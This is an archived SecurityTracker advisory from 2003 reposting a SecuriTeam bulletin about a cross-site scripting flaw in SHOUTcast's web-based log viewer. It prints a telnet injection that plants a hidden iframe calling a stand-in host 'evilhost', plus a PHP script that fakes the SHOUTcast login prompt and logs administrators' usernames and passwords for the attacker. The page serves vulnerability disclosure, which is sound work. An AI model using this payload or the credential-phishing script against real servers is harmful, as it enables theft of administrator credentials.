SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Multimedia)  >   SHOUTcast Vendors:   Nullsoft
SHOUTcast Server Log File Input Validation Flaw Allows Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1006203
SecurityTracker URL:  http://securitytracker.com/id/1006203
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 4 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   An input validation flaw was reported in the SHOUTcast server. A remote user can conduct cross-site scripting attacks against SHOUTcast administrators.

SecuriTeam reported that the web-based administrative front end does not filter HTML code from the log files before displaying the log file information. A remote user can inject specially crafted HTML code into the SHOUTcast log file so that, when a target administrator views the log file, arbitrary scripting code is executed by the target user's browser. The code will originate from the SHOUTcast administrative interface and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit is provided in the Source Message.
Impact:   A remote user can access the target administrator's cookies (including authentication cookies), if any, associated with the SHOUTcast server, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.shoutcast.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  3 Mar 2003 17:05:50 +0200
Subject:  [NEWS] Cross Site Scripting Trick May Fool Shoutcast Admins


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -



  Cross Site Scripting Trick May Fool Shoutcast Admins
------------------------------------------------------------------------


SUMMARY

Shoutcast has a good web front end for its admins to view logs, etc. 
However, the log mechanism does not filter HTML code, and therefore it is 
possible to inject HTML code into the log, and when the admin will view 
it, they will see the code.
This enables a Cross-Site-Scripting attack against an administrator that 
uses the web interface.

DETAILS

Attack example:
---start---
telnet localhost 8001
<IFrame src=http://evilhost/script.php width=0 height=0></iframe>changeme
 
 
invalid password
 

Connection to host lost.

---end---

This inserts an iframe into the browser and when the admin goes to view 
the log all he/she views is:
 [source] invalid password from changeme 127.0.0.1

Exploit code:
script.php can be something like:
<?php 
    $fp = fopen("log.txt","a+");
 if (!isset( $_SERVER["PHP_AUTH_USER"] )) { 
     header( 'WWW-Authenticate: Basic realm="Shoutcast Server"' ); 
     header( 'HTTP/1.0 401 Unauthorized' ); 
     echo '<HTML><HEAD>Unauthorized<title>SHOUTcast 
Administrator</title></HEAD></HTML>';
     exit; 
   } else { 
     fwrite($fp,'|' . $_SERVER["PHP_AUTH_USER"] . '|' . 
$_SERVER["PHP_AUTH_PW"] . '|' . $_SERVER["REMOTE_ADDR"] . $content);
 }
    fclose($fp);
?> 
 
This shows a login screen similar to shoutcast's. Only the information 
entered here is returned directly to the attacker!


ADDITIONAL INFORMATION

The information has been provided by  <mailto:ssingh10@cox.net> ssingh10.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC